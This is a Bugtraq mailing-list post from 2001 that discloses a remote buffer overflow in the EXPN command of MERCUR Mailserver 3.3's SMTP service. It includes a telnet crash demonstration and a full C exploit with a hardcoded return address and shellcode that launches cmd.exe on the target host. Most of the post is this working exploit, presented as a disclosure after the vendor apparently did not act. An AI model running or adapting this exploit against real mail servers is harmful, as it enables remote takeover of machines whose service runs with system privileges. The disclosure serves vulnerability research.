Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Mercur Mailserver 3.3 buffer overflow with EXPN

From: Martin NA <martin () DIRECT SPB RU>
Date: Fri, 23 Feb 2001 12:32:10 -0000
By default SMTP server is installed to be run from 
LocalSystem account.
This makes it easy to make any action on the target 
system if an attacker
could gain control over the code execution flow of the 
product.

Particulary, MERCUR SMTP-Service (binary 
MCRSMTP.EXE version 3.30.3.0)
suffers from buffer overflow illustrated below:

-- Telnet session start --

220 MERCUR SMTP-Server (v3.30.03 Unregistered) 
for Windows NT ready at Thu,
15 F
eb 2001  03:55:34 -0800
EXPN
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Connection to host lost.

C:\>

-- Telnet session end --

Submission of string which contains address the 
processor should jump to at
position 133,134,135 and 136 will gain full control 
over the machine...


Here is exploit that runs an instance of cmd.exe on 
target host:


/*
 MERCUR Mailserver 3.3 Remote Buffer Overflow
 Tested on Win2K AS SP1 with MERCUR SMTP-
Server v3.30.03
 Martin Rakhmanoff
 martin () direct spb ru
*/

#include <winsock2.h>
#include <stdio.h>

/* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
char shellcode[] =
 "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77
\xFF\xD0\x33\xDB\x53"
 "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64
\x2E\x65\x78\x65\x0D\x0A";
/*
In SoftICE bpx 001b:00418b65 - here eip is restored 
with overwritten
value...
*/

int main(int argc, char * argv[]){

 int i;
 char sploit[512];
 char buffer[512];

 WSADATA wsaData;
 SOCKET  sock;
 struct sockaddr_in server;
 struct hostent *hp;

 WSAStartup(0x202,&wsaData);
 hp = gethostbyname("arena");
 memset(&server,0,sizeof(server));
 memcpy(&(server.sin_addr),hp->h_addr,hp-

h_length);

 server.sin_family = hp->h_addrtype;
 server.sin_port = htons(25);
 sock = socket(AF_INET,SOCK_STREAM,0);
 connect(sock,(struct sockaddr*)&server,sizeof
(server));

 sploit[0]='E';
 sploit[1]='X';
 sploit[2]='P';
 sploit[3]='N';
 sploit[4]=0x20;


 for(i=5;i<137;i++){
  sploit[i]=0x41;
 }

 // Return address
 //77E87D8B

 sploit[137]=0x8B;
 sploit[138]=0x89;
 sploit[139]=0xE8;
 sploit[140]=0x77;

 for(i=0;i<sizeof(shellcode);i++){
  sploit[i+141]=shellcode[i];
 }

 recv(sock,buffer,512,0);

 send(sock,sploit,173,0);

 closesocket(sock);
 WSACleanup();

 return 0;
}

Vendor was notified but no action was done...

Martin
Previous By Date Next
Previous By Thread Next

Current thread: